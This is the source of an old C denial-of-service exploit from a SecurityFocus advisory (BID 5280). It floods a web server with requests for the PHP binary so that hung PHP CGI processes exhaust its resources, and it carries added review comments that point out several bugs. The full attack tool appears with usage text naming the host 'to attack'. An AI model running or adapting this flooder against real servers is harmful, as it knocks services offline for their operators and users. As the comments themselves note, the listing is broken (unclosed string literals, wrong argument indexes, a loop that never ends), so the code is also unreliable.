
// source: https://www.securityfocus.com/bid/5280/info
It is possible, under some circumstances, for remote attackers to invoke the PHP interpreter from the web. If the interpreter is invoked with no command line options, it will hang. Attackers may exploit this condition to cause a denial of service.
This is reported to be a problem with PHP and Apache on Microsoft Windows platforms. It may be possible to create this condition in other environments as well.
/* PHP-APACHE.C
 * By Matthew Murphy
 * Exhaust CGI Resources via PHP on Apache
 *
 * Calling PHP with no parameters causes it to
 * never terminate; the process must be killed
 * by the server, the OS, or the admin.
 *
 * PHP on Apache requires you to configure a
 * virtual directory to serve PHP from. PHP implements
 * a "cgi.force_redirect" value to require that
 * a certain environment variable be set to
 * allow PHP to run further.
 *
 * However, an empty command-line *still* will
 * cause PHP to hang. If a remote user does
 * this for a lengthy amount of time, the server
 * may no longer launch PHP or other server-side
 * components.
 *
 * NOTE: The vulnerable config is on Apache,
 * but other servers can still be exploited
 * if they offer PHP.EXE (or an SAPI) directly.
 *
 * Usage: php-apache <host> [phpbin] [port] [maxsocks]
 */
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#define _WINSOCKAPI_ /* Fix for Winsock.h redef errors
*/
#include <winsock2.h> /* WinSock API calls... */
#define WSA_VER 0x0101 /* WinSock ver. to use */
#pragma comment(lib, "wsock32.lib") /* Check your compiler's docs...
*/
#else
#include <signal.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#endif
#define DEF_PHP "/php/php" /* This is used as the PHP
* path if one isn't set
*/
/* printf-style template for the single request sent on every connection;
 * the only substitution is the virtual path of the PHP binary (see main()).
 * No Host header is sent, so each request is "GET <path> HTTP/1.0" + CRLFCRLF. */
static char php_buf[] = "GET %s HTTP/1.0\x0d\x0a\x0d\x0a";
/*
 * Program entry point.
 *
 * Parses the command line, resolves the target host, then repeatedly opens a
 * TCP connection, writes the one request built from php_buf on it and closes
 * it.  `void main` is non-standard C; the function leaves through exit() on
 * errors (status 1) and on the usage message (status 0), otherwise it returns
 * after the loop.
 *
 * Build notes (from the code as listed): exit()/atoi() (stdlib.h), close()
 * (unistd.h) and socket()/connect()/send() (sys/socket.h) are used without
 * their headers being included above, and the FAR qualifier used in the casts
 * below is a Windows-era keyword that nothing defines on the non-_WIN32 side.
 * Several printf() string literals below are split across two lines exactly as
 * they appear on the page -- presumably a line-wrapping artifact of the
 * listing, since a newline inside a string literal does not compile.
 */
void main(int argc, char *argv[]) {
    char host[257];             /* target name; argv[1] is limited to 256 chars below */
    char binpath[257];          /* virtual path of the PHP binary; defaults to DEF_PHP */
    int maxsocks;               /* connections to make; 0 is turned into -1 (no limit) */
    char request[300];          /* "GET " (4) + path (<= 256) + " HTTP/1.0\r\n\r\n" (13) + NUL fits */
    unsigned short port;        /* kept in network byte order (htons) */
    struct hostent *he;
    struct sockaddr_in sa_in;
#ifdef _WIN32
    WSADATA wsa_prov;
    SOCKET s;
#else
    int s;
#endif
    printf("PHP-APACHE.C by Matthew Murphy\x0d\x0a");
    printf("Exhausting CGI resources w/ PHP on
Apache\x0d\x0a\x0d\x0a");
    maxsocks = 0;
    strcpy(&binpath[0], DEF_PHP);   /* default path; overwritten by argv[2] when argc >= 3 */
#ifdef _WIN32
    /* `!x == 0` parses as `(!x) == 0`, i.e. "WSAStartup() returned non-zero",
     * which is the failure case -- the test is correct despite its shape. */
    if (!WSAStartup(WSA_VER, &wsa_prov) == 0) {
        printf("ERROR: Windows Sockets init failed!");
        exit(1);
    }
#endif
    port = (unsigned short)htons(80);   /* default HTTP port, network order */
    /* Every case deliberately falls through into the ones below it, so a
     * larger argc handles all the earlier arguments too.
     * NOTE(review): case 4 reads the port from argv[2], the same slot that
     * case 3 treats as the PHP path; the header comment's usage
     * (<host> [phpbin] [port] [maxsocks]) and the usage text printed in the
     * default branch (<host> [port] [maxsocks] [phpbin]) also disagree with
     * each other, so the intended argument order cannot be confirmed here. */
    switch (argc) {
    case 5:
        maxsocks = atoi(argv[4]);
        /* fallthrough */
    case 4:
        port = htons((unsigned short)atoi(argv[2]));
        /* fallthrough */
    case 3:
        /* binpath is 257 bytes: anything longer than 256 is rejected before strcpy() */
        if (strlen(argv[2]) > 256) {
            printf("ERROR: 256 char path limit exceeded in
'phpbin' argument.");
            exit(1);
        }
        strcpy(&binpath[0], argv[2]);
        /* fallthrough */
    case 2:
        /* same 256-char bound for host (257-byte buffer) */
        if (strlen(argv[1]) > 256) {
            printf("ERROR: No host should be over 256
chars!");
            exit(1);
        }
        strcpy(&host[0], argv[1]);
        break;
    default:
        printf("Usage: php-apache <host> [port] [maxsocks]
[phpbin]\x0d\x0a\x0d\x0ahost - The IP/DNS name to attack\x0d\x0aport - The
port the HTTP service normally runs on (default: 80)\x0d\x0amaxsocks - The
maximum number of connections to establish (creates a finite flood). A
zero value means continue until termination (default: 0)\x0d\x0aphpbin -
The virtual path to the PHP binary (e.g, /php/php[.exe]; default:
/php/php)");
        exit(0);
    }
    /* 0 (the default, or an explicit 0) becomes the -1 "unlimited" sentinel */
    if (maxsocks == 0) {
        maxsocks--;
    }
    sa_in.sin_family = AF_INET;
    sa_in.sin_port = (unsigned short)port;
    he = gethostbyname(&host[0]);   /* IPv4 only; only the first address (h_addr) is used */
    if (he == NULL) {
        printf("ERROR: DNS resolution failed, or unknown host.");
        exit(1);
    }
#ifdef _WIN32
    /* Copies the first resolved address by reinterpreting h_addr as an
     * unsigned long.  Where unsigned long is 8 bytes this reads past the
     * 4-byte IPv4 address before truncating; memcpy() of sizeof sa_in.sin_addr
     * would be the portable form.  Same on the #else side. */
    sa_in.sin_addr.S_un.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#else
    /* NOTE(review): the POSIX struct in_addr member is spelled s_addr;
     * S_addr is the Windows spelling -- confirm this side actually builds. */
    sa_in.sin_addr.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#endif
    /* Builds "GET <binpath> HTTP/1.0\r\n\r\n".  Bounded only because binpath
     * was limited to 256 characters above; no Host header is sent, so every
     * request is identical, which makes the pattern easy to spot in access
     * logs (repeated HTTP/1.0 requests for the PHP binary path). */
    sprintf(&request[0], &php_buf[0], &binpath[0]);
    /* `(!maxsocks) == 0` is just `maxsocks != 0` */
    while (!maxsocks == 0) {
        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s < 0) {
            printf("Couldn't create socket...\x0d\x0aIf you
continue to receive this error, terminate the program.");
        } else {
            /* `(!connect(...)) == 0` is `connect(...) != 0`, i.e. failure.
             * The socket is not closed on this path, so a descriptor leaks
             * on every failed connect until the process exits. */
            if (!connect(s, (const struct sockaddr FAR *)&sa_in, sizeof(struct sockaddr_in)) == 0) {
                printf("Couldn't connect...\x0d\x0aIf you
continue to receive this error, terminate the program.");
            } else {
                /* send()'s return value (short write or error) is not checked */
                send(s, (char FAR *)&request[0], strlen(&request[0]), 0);

                /* If the exploit isn't using up server resources
                 * try removing this -- the server may be killing
                 * the CGI after a disconnect.
                 */

#ifdef _WIN32
                shutdown(s, SD_BOTH);
                closesocket(s);
#else
                close(s);
#endif
            }
        }
        /* `(!maxsocks) == -1` can never be true (!x is 0 or 1), so maxsocks is
         * never decremented here and the loop only ends when the process is
         * terminated, whatever maxsocks was set to. */
        if (!maxsocks == -1) {
            maxsocks--;
        }
    }
    return;
}